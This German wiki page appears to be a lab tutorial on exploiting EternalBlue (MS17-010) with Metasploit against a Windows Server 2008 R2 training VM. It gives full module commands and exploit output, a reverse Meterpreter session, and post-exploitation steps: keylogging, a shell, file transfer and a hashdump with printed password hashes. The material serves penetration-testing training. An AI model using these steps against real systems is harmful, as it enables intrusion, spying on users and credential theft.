Metasploit SMB Schwachstellen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Erste Erkenntnis

Basierend auf den Nmap-Ergebnissen gibt es mehrere offene Ports auf der Windows Server 2008 R2 Maschine, die auf Dienste hinweisen, die Schwachstellen für SMB (Server Message Block) ausnutzen könnten. Die interessanten Ports für SMB sind in diesem Fall:

  • Port 139 (netbios-ssn)
  • Port 445 (microsoft-ds)

Beide Ports werden für SMB-Dienste verwendet, die häufig anfällig für Exploits wie EternalBlue (MS17-010) oder MS08-067 (NetAPI) sind. Diese Exploits sind bekannt dafür, dass sie eine Remotecodeausführung ermöglichen.

Details zur Schwachstelle: EternalBlue (MS17-010)

Schwachstelle: EternalBlue ist eine kritische Schwachstelle in der Implementierung des SMBv1-Protokolls (Server Message Block) in älteren Windows-Versionen, die es einem Angreifer ermöglicht, eine Remote Code Execution (RCE) durchzuführen.

Angriffspunkt: Die Schwachstelle befindet sich im SMBv1-Dienst auf Windows-Betriebssystemen (Port 445). Ein Angreifer kann speziell gestaltete SMB-Pakete senden, um beliebigen Code auf einem anfälligen System auszuführen, ohne sich authentifizieren zu müssen.

Ausnutzung: Ein Angreifer nutzt ein speziell entwickeltes Exploit-Tool, wie es im EternalBlue-Exploit von Metasploit verfügbar ist, um eine Schwachstelle im SMBv1-Protokoll auszunutzen. Ein erfolgreicher Angriff gibt dem Angreifer vollständige Kontrolle über das System.

Schritte zur Ausnutzung

  1. Verwende Metasploit, um nach Systemen zu suchen, die anfällig für EternalBlue sind.
  2. Konfiguriere den EternalBlue-Exploit und setze die Ziel-IP-Adresse (RHOSTS), deine IP-Adresse (LHOST) und den zu verwendenden Payload.
  3. Starte den Exploit. Wenn der Exploit erfolgreich ist, erhält der Angreifer eine Meterpreter-Sitzung und damit vollen Zugriff auf das System.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen, ohne dass eine Authentifizierung erforderlich ist.
  • Weit verbreitet: Die Schwachstelle war in einer großen Anzahl von Windows-Versionen vorhanden, einschließlich Windows 7, Windows Server 2008 R2 und Windows XP.
  • Einfache Verbreitung von Malware: EternalBlue wurde für die Verbreitung von Ransomware wie WannaCry und NotPetya verwendet, was zu erheblichen Schäden weltweit führte.
  • Lateral Movement: Ein Angreifer, der ein System kompromittiert hat, kann EternalBlue nutzen, um sich lateral innerhalb des Netzwerks zu bewegen und weitere Systeme zu infizieren.

Suche

  • search MS17-010
Matching Modules
================

   #   Name                                           Disclosure Date  Rank     Check  Description
   -   ----                                           ---------------  ----     -----  -----------
   0   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

EternalBlue (MS17-010) Exploit überprüfen

Der MS17-010 (EternalBlue)-Exploit ist eine bekannte Schwachstelle in älteren Windows-Versionen, einschließlich Windows Server 2008 R2. Es handelt sich um eine Schwachstelle im SMBv1-Protokoll.

Anwenden

  • use exploit/windows/smb/ms17_010_eternalblue
  • set RHOSTS 10.0.10.107
  • set LHOST 10.0.10.101
  • run
[*] Started reverse TCP handler on 10.0.10.101:4444 
[*] 10.0.10.107:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.0.10.107:445       - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
[*] 10.0.10.107:445       - Scanned 1 of 1 hosts (100% complete)
[+] 10.0.10.107:445 - The target is vulnerable.
[*] 10.0.10.107:445 - Connecting to target for exploitation.
[+] 10.0.10.107:445 - Connection established for exploitation.
[+] 10.0.10.107:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.0.10.107:445 - CORE raw buffer dump (51 bytes)
[*] 10.0.10.107:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.0.10.107:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard 
[*] 10.0.10.107:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.0.10.107:445 - 0x00000030  6b 20 31                                         k 1             
[+] 10.0.10.107:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.0.10.107:445 - Trying exploit with 12 Groom Allocations.
[*] 10.0.10.107:445 - Sending all but last fragment of exploit packet
[*] 10.0.10.107:445 - Starting non-paged pool grooming
[+] 10.0.10.107:445 - Sending SMBv2 buffers
[+] 10.0.10.107:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.0.10.107:445 - Sending final SMBv2 buffers.
[*] 10.0.10.107:445 - Sending last fragment of exploit packet!
[*] 10.0.10.107:445 - Receiving response from exploit packet
[+] 10.0.10.107:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.0.10.107:445 - Sending egg to corrupted connection.
[*] 10.0.10.107:445 - Triggering free of corrupted buffer.
[*] Sending stage (201798 bytes) to 10.0.10.107
[*] Meterpreter session 1 opened (10.0.10.101:4444 -> 10.0.10.107:49358) at 2024-08-28 09:58:43 -0400
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.0.10.107:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Wo bin ich

  • meterpreter > pwd
C:\Windows\system32

Sysinfo

  • meterpreter > sysinfo
Computer        : VAGRANT-2008R2
OS              : Windows Server 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

Upload

  • meterpreter > upload /root/bad-passwords C:\\
[*] Uploading  : /root/bad-passwords -> C:\bad-passwords
[*] Completed  : /root/bad-passwords -> C:\bad-passwords

Download

  • meterpreter > download C:\\Windows\\System32\\drivers\\etc\\hosts
[*] Downloading: C:\Windows\System32\drivers\etc\hosts -> /root/hosts
[*] Skipped    : C:\Windows\System32\drivers\etc\hosts -> /root/hosts

Screenshot

  • meterpreter > screenshot
Screenshot saved to: /root/EcfZiHxv.jpeg

Prozesse

  • meterpreter > ps
Process List
============

 PID   PPID  Name                        Arch  Session  User                          Path
 ---   ----  ----                        ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                      x64   0
 12    484   svchost.exe                 x64   0        NT AUTHORITY\LOCAL SERVICE
 144   484   svchost.exe                 x64   0        NT AUTHORITY\NETWORK SERVICE
 268   4     smss.exe                    x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 312   484   svchost.exe                 x64   0        NT AUTHORITY\LOCAL SERVICE
 340   324   csrss.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 384   324   wininit.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe

Prozess killen

  • meterpreter > kill 5668
Killing: 5668

Shell

  • meterpreter > shell
Process 3564 created.
Channel 5 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  

C:\Windows\system32>

oder

Befehl ausführen

  • meterpreter > execute -f cmd.exe -i -H
Process 5736 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>

Mit exit kommt man wieder raus

Keylogger

  • meterpreter > keyscan_start
  • meterpreter > keyscan_dump
  • meterpreter > keyscan_stop

Passwörter dumpen

  • meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
anakin_skywalker:1011:aad3b435b51404eeaad3b435b51404ee:c706f83a7b17a0230e55cde2f3de94fa:::
artoo_detoo:1007:aad3b435b51404eeaad3b435b51404ee:fac6aada8b7afc418b3afea63b7577b4:::
ben_kenobi:1009:aad3b435b51404eeaad3b435b51404ee:4fb77d816bce7aeee80d7c2e5e55c859:::
boba_fett:1014:aad3b435b51404eeaad3b435b51404ee:d60f9a4859da4feadaf160e97d200dc9:::
chewbacca:1017:aad3b435b51404eeaad3b435b51404ee:e7200536327ee731c7fe136af4575ed8:::
c_three_pio:1008:aad3b435b51404eeaad3b435b51404ee:0fd2eb40c4aa690171ba066c037397ee:::
darth_vader:1010:aad3b435b51404eeaad3b435b51404ee:b73a851f8ecff7acafbaa4a806aea3e0:::
greedo:1016:aad3b435b51404eeaad3b435b51404ee:ce269c6b7d9e2f1522b44686b49082db:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
han_solo:1006:aad3b435b51404eeaad3b435b51404ee:33ed98c5969d05a7c15c25c99e3ef951:::
jabba_hutt:1015:aad3b435b51404eeaad3b435b51404ee:93ec4eaa63d63565f37fe7f28d99ce76:::
jarjar_binks:1012:aad3b435b51404eeaad3b435b51404ee:ec1dcd52077e75aef4a1930b0917c4d4:::
kylo_ren:1018:aad3b435b51404eeaad3b435b51404ee:74c0a3dd06613d3240331e94ae18b001:::
lando_calrissian:1013:aad3b435b51404eeaad3b435b51404ee:62708455898f2d7db11cfb670042a53f:::
leia_organa:1004:aad3b435b51404eeaad3b435b51404ee:8ae6a810ce203621cf9cfa6f21f14028:::
luke_skywalker:1005:aad3b435b51404eeaad3b435b51404ee:481e6150bde6998ed22b0e9bac82005a:::
sshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
sshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
Abgerufen von „http://wiki.ixheim.de/index.php?title=Metasploit_SMB_Schwachstellen&oldid=55912